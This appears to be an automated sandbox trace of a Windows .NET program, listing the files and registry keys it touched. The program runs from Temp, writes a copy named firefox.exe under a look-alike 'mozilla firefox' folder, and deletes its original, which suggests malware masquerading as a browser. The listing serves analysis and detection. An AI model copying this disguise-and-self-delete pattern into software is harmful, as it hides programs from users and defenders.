C:\Windows\Microsoft.NET\Framework\v2.0.50727\diasymreader.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb
C:\Windows\symbols\dll\mscorlib.pdb
C:\Windows\dll\mscorlib.pdb
C:\Windows\mscorlib.pdb
C:\Users\Seven01\AppData\Local\Temp\reg.*
C:\Users\Seven01\AppData\Local\Temp\reg
C:\ProgramData\Oracle\Java\javapath\reg.*
C:\ProgramData\Oracle\Java\javapath\reg
C:\Windows\System32\reg.*
C:\Windows\System32\reg.COM
C:\Windows\System32\reg.exe
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\SysWOW64\ntdll.dll
C:\Windows\System32\it-IT\werui.dll.mui
C:\Windows\System32\werui.dll
C:\Windows\System32\it-IT\DUser.dll.mui
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe.Local\
C:\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_it-it_e4c79be92250cb6e
C:\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_it-it_e4c79be92250cb6e\Comctl32.dll.mui
C:\Windows\Fonts\staticcache.dat
C:\Windows\win.ini
C:\Windows\System32\uxtheme.dll.Config
C:\Windows\System32\uxtheme.dll
C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2
C:\Windows\System32\it-IT\erofflps.txt
C:\Users\Seven01\AppData\Local\Temp\
C:\Users\Seven01\AppData\Local\Temp\WERC841.tmp
C:\Users\Seven01\AppData\Local\Temp\WERC841.tmp.WERInternalMetadata.xml
C:\Windows\System32\drivers\*.mrk
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WER\ReportArchive
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WER\ReportArchive\*_*_*_*
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_firefox.exe_9334f79a58898ea7ce5d107b5642a320668bf3_0b97b819
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_firefox.exe_9334f79a58898ea7ce5d107b5642a320668bf3_0b97b819\Report.wer

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\fast.exe.config
C:\Users\Seven01\AppData\Local\Temp\fast.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\System32\l_intl.nls
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol21.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\System32\tzres.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
\Device\NamedPipe\
C:\Windows\Branding\Basebrd\basebrd.dll
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\Seven01\AppData\Roaming\mozilla firefox\firefox.exe.config
C:\Users\Seven01\AppData\Roaming\mozilla firefox\firefox.exe
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\diasymreader.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb
C:\Windows\symbols\dll\mscorlib.pdb
C:\Windows\dll\mscorlib.pdb
C:\Windows\mscorlib.pdb
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\SysWOW64\ntdll.dll
C:\Windows\System32\it-IT\werui.dll.mui
C:\Windows\System32\werui.dll
C:\Windows\System32\it-IT\DUser.dll.mui
C:\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_it-it_e4c79be92250cb6e\Comctl32.dll.mui
C:\Windows\Fonts\staticcache.dat
C:\Windows\win.ini
C:\Windows\System32\uxtheme.dll.Config
C:\Windows\System32\uxtheme.dll
C:\Windows\System32\it-IT\erofflps.txt
C:\Users\Seven01\AppData\Local\Temp\WERC841.tmp
C:\Users\Seven01\AppData\Local\Temp\WERC841.tmp.WERInternalMetadata.xml

Write Files

C:\Users\Seven01\AppData\Roaming\mozilla firefox\firefox.exe
C:\Users\Seven01\AppData\Local\Temp\Update.txt
C:\Users\Seven01\AppData\Local\Temp\WERC841.tmp.WERInternalMetadata.xml
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_firefox.exe_9334f79a58898ea7ce5d107b5642a320668bf3_0b97b819\Report.wer

Delete Files

C:\Users\Seven01\AppData\Local\Temp\fast.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2352.3644671
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2352.3644671
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2352.3644718
C:\Users\Seven01\AppData\Local\Temp\WERC841.tmp
C:\Users\Seven01\AppData\Local\Temp\WERC841.tmp.WERInternalMetadata.xml

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fast.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\39ee28bd\6a85b0bc
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index21
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
